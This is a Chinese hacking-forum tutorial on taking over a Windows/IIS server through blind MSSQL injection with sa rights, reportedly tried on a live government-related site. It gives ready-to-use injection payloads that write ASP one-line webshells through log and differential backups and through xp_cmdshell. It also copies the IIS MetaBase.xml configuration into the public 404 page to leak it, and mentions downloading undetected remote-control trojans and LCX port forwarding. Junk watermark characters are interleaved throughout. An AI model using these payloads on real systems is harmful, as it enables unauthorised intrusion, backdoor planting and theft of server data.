sa权限的教程.

admin

————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————


4 M0 L9 O( D( N) `- r* x+ [% L0 t/ B                                                             欢迎高手访问指导，欢迎新手朋友交流学习。
' |8 y, R  _, B: `3 G% M/ k
  X% R+ Y7 d# s% ]# F2 g6 U                                                                 
/ m: s/ r; e+ v- T9 F2 H5 p                                                                 
0 Z( z8 Q% y+ [! N                                                                  论坛： http://www.90team.net/
8 w# u- b" S6 t1 L; z0 o/ _8 C


( u8 K* V4 ^& c0 ?友情检测国家人才网
% C% h* w) x. ^) U* {
9 _* C. @4 Y/ {- p  u
- N, b; T8 ^5 A1 `& P7 O0 {内容：MSSQL注入SA权限不显错模式下的入侵

* R2 k0 I% `9 P6 F8 O
一般新手扫到不显错的SA（systemadmin）的注入点时，虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了，今天我给大家演示下如何利用。方法很简单大家看操作。

  n: N% z  J8 P4 c* h' {9 n; q8 |$ H我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。
, S, U, ~  w; w7 ?8 L2 m

这里的主机环境：MSSQL+JSP 权限为不显错的SA，支持多行执行 xp_cmdshell存活 服务器处于内网，WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003，IIS，404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。
/ z6 ]  c# ?& g, j$ [+ P
( `# H& o5 s" H% U9 R思路：

9 |, s$ ~, [6 }' L2 j. h首先：

  Q0 w9 [, q6 z通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面，然后访问WEB站点的一个不存在的目录得到命令执行结果，刺探服务器信息。
" z" b0 y2 L+ G4 [
1.日志备份获得Webshell

1 z5 g" i: B: |- ~$ @; _7 {2 s1 X2.数据库差异备份获得Webshell
+ a: u9 F" C) Q$ `
$ f& w: ?$ H: K) J' z4 P2 e4.直接下载免杀远控木马。
! r, t$ |/ W* ]1 s5 A, Z
5.直接下载LCX将服务器端口转发出来
; ^# ^5 d; q! d9 a3 M" T
6.通过XP_CMDSHELL 执行命令读取iis配置文件（C:\Windows\system32\inetsrv\MetaBase.xml ）分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。
7 m2 f2 e% b5 `5 \2 G: t: ~, c# c2 T

1 H: [- E4 v0 y/ v: M, R* ~9 {
在这里我就不浪费大家时间了，我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了，

我直接演示后面一个方法
+ H) S, M3 d& ]% q3 ]8 A
% o+ G$ |( D" E2 ^, e% {0 Q
; l% M$ m% c! W- O7 ~分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL
- y, Q1 N" c, h1 e! X1 t) j6 {
* g7 \5 l" z' a" e; K$ h) M1 r

' V. p7 f3 w& q' ?% a  S
◆日志备份：

) E) |( X8 c+ r* k! b
% N. ?0 P, E) A% s3 V1. 进行初始备份
; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--

2. 插入数据
) J' v5 y: h1 ]3 @6 i;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--

$ O7 f9 |8 {; L0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
  
  W9 k5 \2 `1 q5 r. j3. 备份并获得文件，删除临时表
- O7 e2 I! I$ ~- ~5 y8 f  @: c$ w;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--
0 Q. s0 W" P/ w! Q$ o
* @, \4 h$ V8 x

9 h3 m, v) p8 f% n7 W2 h# _8 m◆数据库差异备份
; I+ }8 u% S: b. C' I
（1. 进行差异备份准备工作
# D! D2 f1 g( A, d
# s# B& x9 o: q# H;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--
+ n$ `9 \, M+ N) P  V  H
上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码


' j% n& F7 ~4 a$ E  P（2. 将数据写入到数据库
' v" j! F4 N+ r( r8 p" v( u;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
% O5 r7 m+ X$ n* u/ P/ H$ T
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>

3. 备份数据库并清理临时文件
0 Q* Z+ m! o5 r" }. [
;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--

% |# t$ {4 X3 D( R0 E+ e* g0x633A5C746573742E617370  为 c:\test.asp  删除临时文件
5 Q" r4 Q( \. f8 K

/ Q+ l: Y* \$ D) A; {0 K
用^转义字符来写ASP(一句话木马)文件的方法:   
; K5 j( {7 g3 ]) Y% Y
/ Y% V) r- h4 f1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--

$ R% {. t* T: k" }; M+ P  N9 {) I2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp

读取IIS配置信息获取web路径

4 c, B) J* c! k$ R2 C# l5 a( r     
     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--

执行命令
5 Q4 ~% z& W! \# `& H8 Q     
5 D4 I0 c) _( \+ @9 K     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--



% n$ |) o1 V$ z: g. O4 I8 j# l
" W. |; ?: t* g4 n! U& ~' Z; J* ~/ X
) F6 @* a  N7 x9 _7 n" v

3 o3 k. i& D& o$ Y+ O/ ^

+ u9 D0 h; C1 y: n0 l) K8 T% j( l
9 E" e6 A4 W7 M) H
3 h2 {- W5 \7 w2 Z6 n
' w- x% Y- r: M* E0 d4 [
/ c, [) C; v0 n" \
: N3 ~1 e/ C; _  a






! a) ]. x0 E9 [( [1 C3 s! W4 u
0 S9 M+ `) C! ?, J$ D
* A' G/ Z% c5 s- w- M3 O
* D6 ]' a* ^. C3 {- L

' H' _' H! }. v6 l
+ i$ T4 X. \- f2 X




5 J, c- M, l) }2 Z  T



& J% o! K; H( X# v. h3 @
0 V2 {/ [+ r8 X( u6 X/ Y+ w0 z# ]( ^
. y5 I, S3 k: s% Q
; y1 }- r7 ]8 f8 Y


! f/ ]% Q$ A6 K  `% @
9 P( `. Z5 M! h% z. t




+ J: i5 ]# {' [$ S